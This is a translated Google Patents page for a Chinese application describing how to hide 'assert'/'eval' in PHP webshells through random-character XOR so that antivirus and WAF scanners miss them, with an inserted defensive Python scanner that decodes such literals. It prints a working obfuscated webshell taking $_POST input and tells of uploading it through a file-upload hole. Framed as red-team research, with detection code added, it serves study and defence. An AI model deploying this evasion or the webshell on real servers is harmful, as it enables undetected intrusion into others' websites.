CN112099846A - Webshell killing-free method based on random character XOR operation - Google Patents

Info

Publication number: CN112099846A
Authority: CN (China)
Prior art keywords: killing, webshell, characters, sensitive, method based
Legal status: Pending (the legal status is an assumption and is not a legal conclusion; Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed)
Application number: CN202010856314.7A
Other languages: Chinese (zh)
Inventors: 吴建亮, 胡鹏, 梁志颖
Current assignee: Guangzhou Jeeseen Network Technologies Co Ltd (the listed assignees may be inaccurate; Google has not performed a legal analysis)
Original assignee: Guangzhou Jeeseen Network Technologies Co Ltd
Priority date: 2020-08-24 (the priority date is an assumption and is not a legal conclusion)
Filing date: 2020-08-24
Publication date: 2020-12-18

Classifications

    • G06F8/72 Code refactoring (G PHYSICS; G06 COMPUTING, CALCULATING OR COUNTING; G06F ELECTRIC DIGITAL DATA PROCESSING; G06F8/00 Arrangements for software engineering; G06F8/70 Software maintenance or management)
    • G06F21/556 Detecting local intrusion or implementing counter-measures involving covert channels, i.e. data leakage between processes (G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity; G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms; G06F21/55 Detecting local intrusion or implementing counter-measures)
    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements (G06F21/00; G06F21/50; G06F21/55)


Abstract

A webshell killing-free method based on random character XOR operation is characterized in that the sensitive keywords a searching and killing system watches for are represented by characterization characters, and a PHP-script webshell file is constructed from them, so that the searching and killing system cannot recover the sensitive keywords from the characterization characters and the file evades the searching and killing system. The characterization characters differ from the expression characters that make up the sensitive keywords; they embody an exclusive-or relation, and evaluating that exclusive-or relation yields the expression characters of the sensitive keywords. By hiding the sensitive keywords behind characterization characters, the invention evades the searching and killing system. Generation of the killing-free webshell file is flexible and can take many forms. This improves the benefit of red-blue confrontation for network security, further raises the skill of network security personnel, and thus better protects the network.

Description

Webshell killing-free method based on random character XOR operation
Technical Field
The invention relates to the technical field of network security, in particular to a webshell killing-free method based on random character exclusive-or operation.
Background
With the development of internet technology, network security has become ever more important, and so has red-blue confrontation within it. Red-blue teaming is one of the important protective means for an enterprise or organization; its purpose is to cope with the growing number of security holes and the increasingly complex and diversified network attacks. Only by continuously running red-blue confrontation and closing the loop on vulnerabilities can an enterprise build a strong security defense system.
Red-blue confrontation is a continuous process: the adversary's attack means keep changing and improving, and the defense keeps improving in response to keep the network secure. It is often especially important for the red team to gain an entry point at the web boundary, and the webshell has become the core means by which the red team maintains that boundary access. Traditional webshells are strictly watched by all the major antivirus products and by website application level intrusion prevention systems (WAF), which effectively reduces the attacker's efficiency.
In real red-blue confrontation, the attacking side's capability keeps improving, and this matters greatly for the network security of an enterprise or organization: as the attacker's capability improves, the defender's capability is driven to improve correspondingly. Attack capability is therefore also an important research direction in the field of network security, and the ability to quickly make a webshell "killing-free" through code variants has become one of the red team's essential weapons.
Therefore, it is necessary to provide a webshell killing-free method based on random character xor operation to overcome the deficiencies of the prior art.
Disclosure of Invention
The invention aims to avoid the defects of the prior art and provides a webshell killing-free method and test method based on random character XOR operation, which hides the sensitive keywords so that the webshell evades the killing system.
The above object of the present invention is achieved by the following technical means:
in the webshell killing-free method based on random character XOR operation, the sensitive keywords a searching and killing system watches for are represented by characterization characters, and a PHP-script webshell file is constructed from them, so that the searching and killing system cannot recover the sensitive keywords from the characterization characters and the file evades the searching and killing system;
the characterization characters differ from the expression characters that make up the sensitive keywords; they embody an exclusive-or relation, and evaluating that exclusive-or relation yields the expression characters of the sensitive keywords.
Preferably, the sensitive keyword is a sensitive function or keyword.
Preferably, the sensitive keyword is the eval or assert function.
Preferably, in the webshell killing-free method based on random character exclusive-or operation, characterization characters are randomly extracted a first time and each is XOR-ed with the corresponding character of the sensitive keyword to obtain a first exclusive-or expression; the first expression is then written as an exclusive-or with the same first-extracted characterization characters, constructing the PHP-script webshell file.
In another preferred embodiment of the webshell killing-free method based on random character xor operation, each character of the sensitive keyword is itself obtained as the xor of two characters.
Further, in the webshell killing-free method based on random character exclusive-or operation, the searching and killing system is antivirus software or a website application level intrusion prevention system.
Further, the webshell killing-free method based on random character exclusive-or operation provides a random character pool, and the random characters are extracted from that pool.
In the webshell killing-free method based on random character XOR operation, the sensitive keywords a searching and killing system watches for are represented by characterization characters and a PHP-script webshell file is constructed from them, so that the searching and killing system cannot recover the sensitive keywords from the characterization characters and the file evades the searching and killing system; the characterization characters differ from the expression characters that make up the sensitive keywords, they embody an exclusive-or relation, and evaluating that exclusive-or relation yields the expression characters of the sensitive keywords. By hiding the sensitive keywords behind characterization characters, the invention evades the searching and killing system. Generation of the webshell file is randomized, generation of the killing-free webshell file is flexible, and the resulting forms are varied. The attacker's efficiency is greatly improved, a corresponding requirement is placed on the defender, the benefit of red-blue confrontation for network security is improved, the skill of network security personnel is further raised, and the network is better protected.
Detailed Description
The invention is further illustrated by the following examples.
Example 1.
A webshell killing-free method based on random character XOR operation is characterized in that the sensitive keywords a searching and killing system watches for are represented by characterization characters, and a PHP-script webshell file is constructed from them, so that the searching and killing system cannot recover the sensitive keywords from the characterization characters and the file evades the searching and killing system.
The characterization characters differ from the expression characters that make up the sensitive keywords; they embody an exclusive-or relation, and evaluating that exclusive-or relation yields the expression characters of the sensitive keywords.
The searching and killing system is antivirus software or a website application level intrusion prevention system. During defense, the searching and killing software usually checks for sensitive keywords; if sensitive keywords exist in a file, the searching and killing system can block the network security risk. If no sensitive keywords are found in the webshell file, the check passes it.
The technical scheme of the invention uses characterization characters to express the keyword in a form different from the sensitive keyword itself; since the characterization characters contain no sensitive keyword, the searching and killing system is evaded. The result of the XOR operation on the characterization characters is exactly the sensitive keyword, so the function of the original file is preserved. The method therefore achieves the killing-free effect for the webshell while keeping the function of the original file.
The sensitive keyword is a sensitive function or keyword, specifically the eval or assert function.
Among the logical operations, besides AND and OR there is XOR (exclusive or, "异或" in Chinese), defined as: if the two operands are the same the result is false, otherwise true. XOR can therefore be used to test whether two values differ:
true XOR true // false
false XOR false // false
true XOR false // true
false XOR true // true
XOR has one further property: applying XOR with the same value twice in succession returns the original value.
1010 ^ 1111 // 0101 (first XOR)
0101 ^ 1111 // 1010 (second XOR)
It is this reversibility of the XOR operation that the killing-free webshell relies on.
The core of a PHP webshell is the eval function and the assert function; these two sensitive functions or keywords are also the focus of traditional antivirus software and WAF.
In the webshell killing-free method based on random character XOR operation, characterization characters are randomly extracted a first time and each is XOR-ed with the corresponding character of the sensitive keyword to obtain a primary XOR expression; the primary expression is then written as an XOR with the same first-extracted characterization characters, constructing the PHP-script webshell file.
For example, in one embodiment:
the original function is assert, and a string of six characters is formed by randomly extracting characters and symbols to construct the PHP webshell file. In PHP (the construction appears as a figure in the original and is not reproduced here):
then the traditional webshell:
<?php assert($_POST[123]); ?>
is structured as follows:
<?php $a='IWP"NK'^'($#G<?'; $a($_POST[123]); ?>
In <?php assert($_POST[123]); ?>, because the file contains assert, it is flagged by antivirus software and WAF and cannot pass safety detection. Structured as <?php $a='IWP"NK'^'($#G<?'; $a($_POST[123]); ?>, the file no longer contains the sensitive keyword.
In this example, each character of the sensitive keyword to be constructed is XOR-ed with a random character to obtain the first XOR expression 'IWP"NK'; the first XOR expression 'IWP"NK' is then XOR-ed in the script with the first randomly extracted characterization characters '($#G<?', which yields assert at run time.
The example was applied in a real scenario to verify its effectiveness:
the red team finds a website with an arbitrary file upload vulnerability and can upload a webshell file (.php).
The code is the traditional webshell: <?php assert($_POST[123]); ?>
This file is found to be killed by the antivirus software.
A killing-free webshell file shell2.php is constructed using the exclusive-or principle: <?php $a='IWP"NK'^'($#G<?'; $a($_POST[123]); ?>
Shell2.php is uploaded to the vulnerable website, and the antivirus scan result shows no risk. Connecting to the webshell with China Chopper (中国菜刀), the uploaded Shell2.php file is accessed normally.
By hiding the sensitive keywords behind characterization characters, the invention evades the searching and killing system. Generation of the webshell file is randomized, generation of the killing-free webshell file is flexible, and the resulting forms are varied. The attacker's efficiency is greatly improved, a corresponding requirement is placed on the defender, the benefit of red-blue confrontation for network security is improved, the skill of network security personnel is further raised, and the network is better protected.
Example 2.
A webshell killing-free method based on random character XOR operation with the same features as Example 1, except that the webshell killing-free file is constructed through the XOR operation in a different way.
Each character of the sensitive keyword is obtained as the XOR of characters. Taking eval as an example, for each of "e", "v", "a" and "l" in turn, a pair of characters whose xor yields that character is randomly extracted, and the PHP webshell file is constructed from these pairs.
Since there are many character pairs whose exclusive-or yields "e", many whose exclusive-or yields "v", and so on, there are many ways to construct a sensitive keyword expressed by exclusive-or relations, and the choice is random. PHP webshell files constructed at different times therefore take different forms, with diversity and randomness. However the characters are extracted, it is only necessary that the result of the final exclusive-or operation equals assert or eval.
The webshell killing-free method based on random character XOR operation can provide a random character pool from which the random characters are extracted, which is convenient for constructing the XOR relation.
Several webshell killing-free files formed by the method of the invention were verified, and the results show that they evade the searching and killing system.
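As an added example that is not part of the patent: a small scanner, written from the searching and killing system's side, that resolves PHP `'x'^'y'` string literals (Example 1) and `.`-concatenated per-character XOR pairs (Example 2) and reports any sensitive keyword they hide. The sample inputs are constructed for this example, and the keyword list beyond eval and assert is an assumption of this example.

```python
import re

# A PHP single-quoted string literal (handles the \' and \\ escapes).
STR = r"'((?:[^'\\]|\\.)*)'"
# 'x' ^ 'y', optionally wrapped in parentheses as in ('Q'^'4').('T'^'"')...
XOR_PAIR = re.compile(r"\(?\s*" + STR + r"\s*\^\s*" + STR + r"\s*\)?")
# Text that may sit between two XOR pairs joined by PHP's '.' concatenation.
GLUE = re.compile(r"^[\s.()]*$")

# eval and assert are the keywords the patent names as the AV/WAF focus; the
# remaining entries are this example's own assumption of other watched sinks.
SENSITIVE = {"eval", "assert", "system", "exec", "passthru", "shell_exec"}

# Constructed sample inputs (not taken from any real site). XOR_STRING is the
# patent's Example 1 payload; XOR_CHARS is built in the style of Example 2,
# one XOR pair per character of "eval".
PLAIN = "<?php assert($_POST[123]); ?>"
XOR_STRING = "<?php $a='IWP\"NK'^'($#G<?'; $a($_POST[123]); ?>"
XOR_CHARS = "<?php $f=('Q'^'4').('T'^'\"').('#'^'B').('N'^'\"'); $f($_POST['x']); ?>"


def unescape(s):
    """Undo the two escapes PHP recognizes inside single-quoted strings."""
    return s.replace("\\'", "'").replace("\\\\", "\\")


def xor_str(a, b):
    """PHP's string ^ string: byte-wise XOR, truncated to the shorter operand."""
    n = min(len(a), len(b))
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a[:n], b[:n]))


def decode_xor_literals(src):
    """Every 'x'^'y' in src, as (decoded text, start offset, end offset)."""
    return [(xor_str(unescape(m.group(1)), unescape(m.group(2))), m.start(), m.end())
            for m in XOR_PAIR.finditer(src)]


def recovered_strings(src):
    """Decode XOR pairs and merge runs joined only by '.' into one string."""
    out, cur, last_end = [], "", None
    for text, start, end in decode_xor_literals(src):
        gap = src[last_end:start] if last_end is not None else ""
        if last_end is not None and GLUE.match(gap) and "." in gap:
            cur += text  # continuation of a concatenated keyword
        else:
            if cur:
                out.append(cur)
            cur = text
        last_end = end
    if cur:
        out.append(cur)
    return out


def scan(src):
    """Report sensitive keywords found in the clear and those hidden behind XOR."""
    plain = sorted(k for k in SENSITIVE if re.search(r"\b" + k + r"\s*\(", src))
    hidden = sorted({s for s in recovered_strings(src) if s in SENSITIVE})
    return {"plain": plain, "xor_hidden": hidden}


if __name__ == "__main__":
    for name, src in (("PLAIN", PLAIN), ("XOR_STRING", XOR_STRING), ("XOR_CHARS", XOR_CHARS)):
        print(name, scan(src))
```

A keyword-only scanner passes the two XOR variants while this resolver flags both, which is the gap the patent relies on.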
Finally, it should be noted that the above embodiments are only used for illustrating the technical solutions of the present invention and not for limiting the protection scope of the present invention, and although the present invention is described in detail with reference to the preferred embodiments, it should be understood by those skilled in the art that modifications or equivalent substitutions can be made on the technical solutions of the present invention without departing from the spirit and scope of the technical solutions of the present invention.

Claims (7)

1. A webshell killing-free method based on random character XOR operation, characterized in that the sensitive keywords a searching and killing system watches for are represented by characterization characters, a PHP-script webshell file is constructed from them, and the searching and killing system cannot recover the sensitive keywords from the characterization characters, so that the file evades the searching and killing system;
the characterization characters differ from the expression characters that make up the sensitive keywords; they embody an exclusive-or relation, and evaluating that exclusive-or relation yields the expression characters of the sensitive keywords.
2. The webshell killing-free method based on random character exclusive-or operation as claimed in claim 1, wherein the sensitive keyword is a sensitive function or a keyword.
3. The webshell killing-free method based on random character exclusive-or operation as claimed in claim 2, wherein the sensitive keyword is the eval or assert function.
4. The webshell killing-free method based on random character XOR operation as claimed in claim 3, wherein characterization characters are randomly extracted a first time and each is XOR-ed with the corresponding character of the sensitive keyword to obtain a first XOR expression, and the first expression is then written as an XOR with the same first-extracted characterization characters to construct the PHP-script webshell file.
5. The webshell killing-free method based on random character exclusive-or operation as claimed in claim 3, wherein each character of the sensitive keyword is obtained as the exclusive-or of characters.
6. The webshell killing-free method based on random character XOR operation as claimed in any one of claims 1 to 5, wherein the killing system is antivirus software or a website application level intrusion prevention system.
7. The webshell killing-free method based on random character exclusive-or operation as claimed in claim 6, wherein a random character pool is provided and the random characters are extracted from the random character pool.

Priority Applications (1)

Application Number | Priority Date | Filing Date | Title
CN202010856314.7A | 2020-08-24 | 2020-08-24 | Webshell killing-free method based on random character XOR operation (CN112099846A, pending)

Publications (1)

Publication Number | Publication Date
CN112099846A | 2020-12-18

Family

ID=73754178

Country Status (1)

CN: CN112099846A (en)

Citations (7)

* Cited by examiner, † Cited by third party
Publication number | Priority date | Publication date | Assignee | Title
CN1604585A * | 2003-09-30 | 2005-04-06 | 华为技术有限公司 | Method for security transmission of card number information from IP terminal to soft switch
CN104933361A * | 2015-06-05 | 2015-09-23 | 浪潮电子信息产业股份有限公司 | Device and method for protecting login password
CN106919811A * | 2015-12-24 | 2017-07-04 | 阿里巴巴集团控股有限公司 | File test method and device
CN108259619A * | 2018-01-30 | 2018-07-06 | 成都东软学院 | Network request means of defence and network communicating system
US20190141075A1 * | 2017-11-09 | 2019-05-09 | Monarx, Inc. | Method and system for a protection mechanism to improve server security
DE102018102386A1 * | 2018-02-02 | 2019-08-08 | Infineon Technologies Ag | Method for transmitting data, method for receiving data, master, slave, and master-slave system
CN111163094A * | 2019-12-31 | 2020-05-15 | 奇安信科技集团股份有限公司 | Network attack detection method, network attack detection device, electronic device, and medium


Legal Events

Code | Title
PB01 | Publication
SE01 | Entry into force of request for substantive examination
RJ01 | Rejection of invention patent application after publication

Application publication date: 20201218